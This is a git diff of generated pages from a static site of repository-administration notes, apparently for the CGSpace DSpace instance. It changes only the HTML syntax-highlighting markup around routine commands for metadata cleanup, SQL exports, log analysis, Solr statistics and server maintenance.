                                                                                                                                                                                                                                                                                                                                                                                                                    99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                                                   120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                                              @@ -308,7 +308,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                            • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                                                            • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                                                            • Time to index ~70,000 items on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                            • diff --git a/docs/page/6/index.html b/docs/page/6/index.html index 61c5d3e45..cb9382cf4 100644 --- a/docs/page/6/index.html +++ b/docs/page/6/index.html @@ -10,14 +10,14 @@ - + - + @@ -166,11 +166,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                            • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                                                            2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                                                            -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                            +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                                                             dspace.log.2017-11-23:4
                                                                                                                                                                                                                                                                                                                                                                                                            @@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                             0
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                            dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                            dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                             COPY 54701
                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                            Read more → diff --git a/docs/page/7/index.html b/docs/page/7/index.html index 167c0b15e..1eaf3c910 100644 --- a/docs/page/7/index.html +++ b/docs/page/7/index.html @@ -10,14 +10,14 @@ - + - + @@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                          • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                                                          • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                          Read more → @@ -210,7 +210,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                          • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                          dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                                                             id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                                                           -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                                                            92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                                                          @@ -268,11 +268,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                        • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                                                        • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                        -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
-2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                        • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                                                        • I’ve raised a ticket with Atmire to ask
@@ -354,7 +354,7 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                        • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                                                        • It looks like we might be able to use OUs now, instead of DCs:
                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                        $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                                                         
Read more →
diff --git a/docs/page/8/index.html b/docs/page/8/index.html
index 230f4ed35..20240233c 100644
--- a/docs/page/8/index.html
+++ b/docs/page/8/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                                                                      • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                                                                      • I think this query should find and replace all authors that have “,” at the end of their names:
                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                       UPDATE 95
                                                                                                                                                                                                                                                                                                                                                                                                      -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                      +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                                                        text_value
                                                                                                                                                                                                                                                                                                                                                                                                       ------------
                                                                                                                                                                                                                                                                                                                                                                                                       (0 rows)
                                                                                                                                                                                                                                                                                                                                                                                                      @@ -198,7 +198,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                    • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                                                                    • There are 3,000 IPs accessing the REST API in a 24-hour period!
                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                    # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                     3168
                                                                                                                                                                                                                                                                                                                                                                                                     
Read more →
@@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                                                  • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                                                                  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                                                   78
                                                                                                                                                                                                                                                                                                                                                                                                   
Read more →
diff --git a/docs/posts/index.html b/docs/posts/index.html
index 5bdda859d..247930431 100644
--- a/docs/posts/index.html
+++ b/docs/posts/index.html
@@ -10,14 +10,14 @@
-
+
-
+
@@ -109,11 +109,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                  • Send Gaia the last batch of potential duplicates for items 701 to 980:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
                                                                                                                                                                                                                                                                                                                                                                                                  +
Read more →
@@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
                                                                                                                                                                                                                                                                                                                                                                                                • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                                                                                • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                                                              • I experimented with manually sharding the Solr statistics on DSpace Test
                                                                                                                                                                                                                                                                                                                                                                                              • First I exported all the 2019 stats from CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                              -$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              $ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
                                                                                                                                                                                                                                                                                                                                                                                              +$ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -238,15 +238,15 @@ $ zstd statistics-2019.json
                                                                                                                                                                                                                                                                                                                                                                                              • Export all affiliations on CGSpace and run them against the latest RoR data dump:
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                              -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                              -1879
                                                                                                                                                                                                                                                                                                                                                                                              -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                              -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                +1879
                                                                                                                                                                                                                                                                                                                                                                                                +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                • So we have 1879/7100 (26.46%) matching already
                                                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                • Update Docker images on AReS server (linode20) and reboot the server:
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  # docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → @@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                  -COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                  +COPY 20994
                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                  Read more → diff --git a/docs/posts/index.xml b/docs/posts/index.xml index b8238e4e8..06fbf986e 100644 --- a/docs/posts/index.xml +++ b/docs/posts/index.xml @@ -17,11 +17,11 @@ <ul> <li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv -$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv -$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv -$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv +</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv +</span></span><span 
style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv +</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv +</span></span></code></pre></div> @@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv & <li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li> <li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li> </ul> -<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p -Purging 1989 hits from The Knowledge AI in statistics -Purging 1235 hits from MaCoCu in statistics -Purging 455 hits from WhatsApp in statistics -<span style="color:#960050;background-color:#1e0010"> -</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679 -</code></pre></div> +<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p +</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics +</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics +</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics +</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"> +</span></span></span><span style="display:flex;"><span><span 
